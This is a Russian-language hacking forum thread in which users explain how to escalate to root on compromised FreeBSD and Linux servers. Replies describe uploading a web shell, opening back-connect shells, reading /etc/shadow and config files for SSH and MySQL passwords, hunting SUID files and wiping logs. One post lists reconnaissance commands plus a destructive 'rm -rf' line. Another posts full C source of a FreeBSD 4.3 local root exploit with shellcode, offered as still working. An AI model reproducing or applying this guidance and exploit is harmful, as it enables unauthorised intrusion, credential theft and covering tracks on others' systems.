Просмотр полной версии : Помогите Взять root.
Короче как брать рута на Фряхе Линюксе...
Опишите все по шажкам... Что в первую очередь надо посмотреть где могут быть пароли в часности интрересует ssh.
БольшОЕ Спасибо Прозьба тем кто не знает не писать.!
так так=) отвечаю все подробно...
сначала заливаешь шелл , потом пробиваешь к консоли (бек коннект, бинд) после того как пробился к консоли то есть ты уже в системе набираешь uname -a если линуха + кернел НЕ 2005 то можно попробывать взять паблик сплойтами которые лежат web-hack.ru/exploit , а перед всем этим не забываем проверять на наличие компилятора и качалок (which wget curl lynx fetch links get, which gcc cc) вот так.. а пассы от SSH бывают в /etc/shadow на всякий случай можешь попробвать как зашел в систему cat /etc/shadow но это далеко не каждый раз случается=) так что качаешь сплойты с сайта компилишь запускаешь.. чего непонятно спрашивай не стесняйся!))
ухахаха :)))))))))))))))
/etc/shadowЭто в линуксе, в фряхе master.passwd насколько я помню))
Под фряху не припомню ядерных експлойтов,так что все зависит от демонов,хотя все оч. самнительно...
Бывает часто плохо права выставленны...
Еще как бы в развитие темы первой командой ИМХо жолжна быть who
Ещё неплохо поискать config.inc.php очень часто пароль на мускул и ssh совпадают.
qBiN у мя например такое было=))
Еще как бы в развитие темы первой командой ИМХо жолжна быть who
ну это рута не касается... это для соблюдения безопасности=)
Народ кто готов Дайю шалл ip:порт вы снимаете видео по поиску всего что описали...
Исход не имееть значения.... как вам? кто готов в асю 30003111
Вообщем вы мне нечего нового не сказали...
Вот собственно мои знания...
$pwd;id;ls -la
$who
$uname -a
$which gcc
$which wget
$which lynx
$which fetch
$ps -ax
$find / -type f -perm -04000 -ls // поиск файлов с sqid битом
$find / -type f -name "config*" //поиск по маске всех файлов с именем config*(манипулиренм названиями.
$find . -type f -name "config*" тоже самое токо ищем директории.
$find / -type f -name .htpasswd // без коментариев.
$find / -type f -name .bash_history // ищем историю bash оболочки.
$netstat -an | grep -i listen // без коментариев.
$find / -type d -perm 0777 //ищем папки с правами на запись.
$sysctl -a | grep version // более точный способ определения OS
$cat /proc/version // Версия ядра.
$cat /etc/syslog.conf // смотрим syslog
$cat /etc/hosts // смотрим виртуальные хосты.
$locate httpd.conf // без коментариев.
$cd /; rm -rf // :)
Вот собственно все что хотел вам сказать...
Меня еще интересует вопросы
1)Что делать с фалами которые имеют sqid биты?
2)Где еще могу быть пароли ваши линей взлома.
3)Еще команды блоки команд.
4)Да еще чистка логов...
Вообщем меня интересует взлом системы без применения сплойтов.
хихихихи)))
Ты что копировал из-какого нить шелла с алиасами?
Нах тебе искать то что ты не понимаешь:?:
sqid suid биты например. Вопще поставь себе линукс,мож выучиешь что-нибуть))))
sqid suid-права файла выполняться от прав рута они чем-то отличаются только хз чем :)
логи почистить ванишем, чистит хорошо но медленно.
хихихихи)))
Ты что копировал из-какого нить шелла с алиасами?
Нах тебе искать то что ты не понимаешь:?:
sqid suid биты например. Вопще поставь себе линукс,мож выучиешь что-нибуть))))
sqid suid-права файла выполняться от прав рута они чем-то отличаются только хз чем :)
Да...
Я по твоему не знал что sqid биты запушены от рута и имеют его привелегии.
Я Спрашивал про использывание их для получения рута.!
Насчет алиасов когда я используй веб шел мне свойственно запоминать команды если ты их сам придумываешь из головы из своей а не где не смотришь или узнаешь то извини...
Лан погорячился...
логи почистить ванишем, чистит хорошо но медленно.
Я имею ввиду ручками...
Нах ручками так быстрее.
как предложил k1b0rg
или от RST
stelchem
ухахаха :)))))))))))))))
Это в линуксе, в фряхе master.passwd насколько я помню))
Под фряху не припомню ядерных експлойтов,так что все зависит от демонов,хотя все оч. самнительно...
Бывает часто плохо права выставленны...
Хех,ты забыл про один бронебойный сплойт.
Кому надо...Сплойт рабочий,бага актуальна....
/*
FreeBSD 4.3 local root exploit using shared signals.
Written by Georgi Guninski http://www.guninski.com
*/
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
int vv1;
#define MYSIG SIGINT
//exec "/tmp/sh", shellcode gotten from the internet and modified
unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
"\x31\xc0\x50\x50\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80\x90\x90\x90";
typedef (*PROG)();
extern char **environ;
int main(int ac,char **av)
{
int pid;
//(*(PROG)bsdshell)();
if(!(vv1=getenv("vv")))
{
setenv("vv",bsdshell,1);
if(!execle(av[0],"vv",NULL,environ))
{
perror("weird exec");
exit(1);
}
}
printf("vvfreebsd. Written by Georgi Guninski\n");
printf("shall jump to %x\n",vv1);
if(!(pid=rfork(RFPROC|RFSIGSHARE)))
{
printf("child=%d\n",getpid());
// /usr/bin/login and rlogin work for me. ping gives nonsuid shell
// if(!execl("/usr/bin/rlogin","rlogin","localhost",0))
if(!execl("/usr/bin/login","login",0))
{
perror("exec setuid failed");
exit(2);
};
}
sleep(2);
signal(MYSIG,(sig_t)vv1);
sleep(2);
kill(pid,MYSIG);
printf("done\n");
while(42);
}
Desr0w, взлом укртелекома? ;)
Хех,ты забыл про один бронебойный сплойт.Дату моего сообщения посмотри.
блин где вы этот топик откапали! хватит уже древние поднимать)))
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot